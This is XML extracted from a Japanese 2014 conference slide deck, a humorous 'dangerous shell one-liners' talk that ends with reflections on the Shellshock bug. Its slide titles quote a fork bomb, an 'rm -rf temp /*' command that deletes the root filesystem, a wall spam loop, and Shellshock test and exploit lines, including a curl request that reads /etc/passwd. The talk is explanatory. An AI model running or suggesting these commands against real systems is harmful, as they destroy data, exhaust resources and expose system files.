              <a:rPr kumimoji="1" lang="en-US" altLang="ja-JP" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Let's try!!!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2014/10/19</a:t>
            </a:r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OSC Tokyo/Fall 2014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655-C245-0940-ADDB-4E06ABBCA83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0" name="図 9" descr="ss_family_0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97" y="1202493"/>
            <a:ext cx="5340784" cy="51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1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795</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>画面に合わせる (4:3)</PresentationFormat>
  <Paragraphs>181</Paragraphs>
  <Slides>34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ホワイト</vt:lpstr>
      <vt:lpstr>第1回 危険シェル芸勉強会</vt:lpstr>
      <vt:lpstr>みなさん OSCお疲れさまでした</vt:lpstr>
      <vt:lpstr>しかし 本日はここからが本番です</vt:lpstr>
      <vt:lpstr>第1回危険シェル芸勉強会 を勝手に開催致します</vt:lpstr>
      <vt:lpstr>危険シェル芸とは</vt:lpstr>
      <vt:lpstr>思い出す夏の危険シェル芸騒動</vt:lpstr>
      <vt:lpstr>戦果（？）</vt:lpstr>
      <vt:lpstr>本日はこの中から 特に危険なのを勉強   ちゃんとマスターしましょう</vt:lpstr>
      <vt:lpstr>ということでLet's try!!!</vt:lpstr>
      <vt:lpstr>ひとつめ</vt:lpstr>
      <vt:lpstr> :(){: | : &amp;};:</vt:lpstr>
      <vt:lpstr>危険</vt:lpstr>
      <vt:lpstr>ふたつめ</vt:lpstr>
      <vt:lpstr>rm -rf temp /* テンポラリを削除 */  </vt:lpstr>
      <vt:lpstr>PowerPoint プレゼンテーション</vt:lpstr>
      <vt:lpstr>みっつめ</vt:lpstr>
      <vt:lpstr># for x in `seq 1 10000`;  do wall '我はroot。神だ' ; done</vt:lpstr>
      <vt:lpstr>迷惑</vt:lpstr>
      <vt:lpstr>危険</vt:lpstr>
      <vt:lpstr>世界は危険に飢えている発言</vt:lpstr>
      <vt:lpstr>そんなある日、 一つのワンライナーが Twitterに出回る</vt:lpstr>
      <vt:lpstr>$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" </vt:lpstr>
      <vt:lpstr>PowerPoint プレゼンテーション</vt:lpstr>
      <vt:lpstr>！？</vt:lpstr>
      <vt:lpstr>$ curl -A '() { :; }; /bin/cat /etc/passwd | /usr/bin/tail -n 3' http://localhost/index.php</vt:lpstr>
      <vt:lpstr>PowerPoint プレゼンテーション</vt:lpstr>
      <vt:lpstr>あかんやろ</vt:lpstr>
      <vt:lpstr>危険シェル芸で遊んでいたら シェルが危険だった</vt:lpstr>
      <vt:lpstr>Shellshock後の世界</vt:lpstr>
      <vt:lpstr>自著が危険書物扱い</vt:lpstr>
      <vt:lpstr>なぜか安否を確認される</vt:lpstr>
      <vt:lpstr>なぜか原稿を依頼される（焼け太り）</vt:lpstr>
      <vt:lpstr>結論</vt:lpstr>
      <vt:lpstr>以上。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 危険シェル芸勉強会</dc:title>
  <dc:creator>UEDA Ryuichi</dc:creator>
  <cp:lastModifiedBy>UEDA Ryuichi</cp:lastModifiedBy>
  <cp:revision>129</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-10-16T09:06:03Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-10-19T07:59:17Z</dcterms:modified>
</cp:coreProperties>
</file>